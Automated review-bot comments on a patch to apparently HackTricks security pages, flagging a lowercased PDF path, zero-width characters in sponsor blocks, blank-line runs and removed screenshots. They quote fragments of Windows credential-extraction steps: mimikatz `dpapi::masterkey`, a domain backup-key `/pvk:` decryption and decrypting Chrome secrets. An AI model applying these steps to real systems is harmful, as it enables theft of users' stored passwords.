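Review bot: in hunk `@@ -819,7 +833,7 @@`, the `{% file src=... %}` path is changed from `EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf` to the all-lowercase `en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf`, but no rename of the asset itself is visible in this patch; on a case-sensitive host the old file will not resolve under the new name, so confirm the PDF under `../../.gitbook/assets/` was renamed in the same commit or the BlackHat PDF link breaks.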
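Review bot: in hunk `@@ -842,6 +856,12 @@`, the inserted `[**RootedCON**]` line is prefixed with three zero-width spaces (`​​​[**RootedCON**]`), a different count from the other copies of the same block in this patch; these invisible characters survive copy and paste and make the blocks diff against each other for no reason. Remove them here and keep one canonical copy of the sponsor block.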
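Review bot: in the dpapi-extracting-passwords.md hunk `@@ -12,6 +12,16 @@`, the insertion leaves four consecutive blank lines between `{% embed url="https://www.rootedcon.com/" %}` and the `While creating this post mimikatz was having problems...` paragraph, and the `[**RootedCON**]` line again starts with two zero-width spaces; collapse the blank run to a single empty line and strip the invisible characters. Keeping the attribution paragraph (most examples taken from ired.team) immediately visible after the front matter also matters here, since it tells the reader which commands on the page were not reproduced by the author.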
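Review bot: in hunk `@@ -120,8 +130,6 @@`, removing `![](<../../.gitbook/assets/image (325).png>)` leaves the sentence `The master key of the file will appear in the output.` with nothing that shows the reader what that output looks like, so they cannot tell whether their `dpapi::masterkey` run succeeded; either keep the screenshot or replace it with the relevant output line (with the key value redacted) so the step stays verifiable.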
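Review bot: in hunk `@@ -154,8 +162,6 @@`, deleting `![](<../../.gitbook/assets/image (328).png>)` after the `/pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk` command removes the only illustration of a successful backup-key decryption, yet the following sentence (`We can now decrypt user's spotless chrome secrets using their decrypted master key`) presumes the reader has seen that result. Add a one-line description of what a successful decryption reports, or keep the figure.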
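Review bot: in hunk `@@ -183,8 +189,6 @@`, dropping `![](../../.gitbook/assets/HEKATOMB.png)` is harmless, but it leaves the quoted tagline `"Because Domain Admin rights are not enough. Hack them all."` standing alone after the tool description with no attribution, so it now reads as the page's own advice rather than the project's motto; either remove the quote together with the logo or prefix it with the project name.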
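Review bot: in hunk `@@ -194,6 +198,14 @@`, the sponsor block is inserted between the references list and `Support HackTricks and get benefits!` with two stray blank lines before it and trailing blank lines after it; trim to one empty line on each side. This copy is also the only one in the patch whose `[**RootedCON**]` line has no leading zero-width characters, which is the form the others should be normalized to.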